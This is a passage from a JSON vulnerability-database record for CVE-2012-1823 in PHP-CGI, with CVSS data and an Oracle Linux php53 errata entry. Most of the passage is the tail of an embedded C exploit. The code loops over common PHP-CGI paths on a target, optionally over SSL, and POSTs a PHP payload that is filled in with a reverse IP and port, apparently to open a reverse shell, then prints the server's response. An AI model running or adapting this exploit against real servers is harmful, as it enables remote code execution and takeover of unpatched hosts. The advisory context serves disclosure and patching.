(7)\\n\");\n exit(255);\n }\n\n char *interpreters[5];\n int ninterpreters = 5;\n interpreters[0] = strdup(\"/cgi-bin/php\");\n interpreters[1] = strdup(\"/cgi-bin/php5\");\n interpreters[2] = strdup(\"/cgi-bin/php-cgi\");\n interpreters[3] = strdup(\"/cgi-bin/php.cgi\");\n interpreters[4] = strdup(\"/cgi-bin/php4\");\n \n for (i=0;i<ninterpreters;i++) {\n interpreter = interpreters[i];\n if (forceinterpreter) {\n interpreter = strdup(forceinterpreter);\n }\n if (forceinterpreter && i)\n break;\n printf(\"%s\\n\", interpreter);\n \n sockfd = socket(AF_INET, SOCK_STREAM, 0);\n if (sockfd < 1) { \n\t printf(\"socket error (8)\\n\");\n\t exit(255);\n }\n \n if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) < 0) {\n printf(\"connect error (9)\\n\");\n exit(255);\t \n }\n if (httpsflag) {\n sslconnection = (connection*) malloc(sizeof(connection));\n if (!sslconnection) {\n printf(\"malloc error (10)\\n\");\n exit(255); \n }\n sslconnection->handle = NULL;\n sslconnection->ctx = NULL;\n\n SSL_library_init();\n\n sslconnection->ctx = SSL_CTX_new(SSLv23_client_method());\n if (!sslconnection->ctx) {\n \t printf(\"SSL_CTX_new error (11)\\n\");\n exit(255);\n }\n\n sslconnection->handle = SSL_new(sslconnection->ctx);\n if (!sslconnection->handle) {\n \t printf(\"SSL_new error (12)\\n\");\n\t exit(255); \n }\n if (!SSL_set_fd(sslconnection->handle, sockfd)) {\n \t printf(\"SSL_set_fd error (13)\\n\");\n exit(255);\n }\n \n if (SSL_connect(sslconnection->handle) != 1) {\n\t printf(\"SSL_connect error (14)\\n\");\n exit(255); \n }\n }\n \n tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64;\n tmpstr = (char*)calloc(tmpsize, sizeof(char));\n snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);\n \n writesize = strlen(target) + strlen(interpreter) + \n strlen(poststr) + strlen(tmpstr) + 64;\n writestr = (char*)calloc(writesize, sizeof(char));\n snprintf(writestr, writesize, poststr, interpreter,\n target, strlen(tmpstr), tmpstr);\n \n if 
(!httpsflag) {\n\t write(sockfd, writestr, strlen(writestr));\n\t readbuf = read_(sockfd);\n } else {\n\t SSL_write(sslconnection->handle, writestr, strlen(writestr));\n\t readbuf = sslread(sslconnection);\n }\n \n if (readbuf) {\n printf(\"***SERVER RESPONSE***\\n\\n%s\\n\\n\", readbuf); \n } else {\n printf(\"read error (15)\\n\");\n exit(255);\t \n }\n }\n exit(1);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823"], "description": "[5.3.3-7]\n- correct detection of = in CVE-2012-1823 fix (#818607)\n[5.3.3-6]\n- add security fix for CVE-2012-1823 (#818607)", "edition": 4, "modified": "2012-05-07T00:00:00", "published": "2012-05-07T00:00:00", "id": "ELSA-2012-0547", "href": "http://linux.oracle.com/errata/ELSA-2012-0547.html", "title": "php53 security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}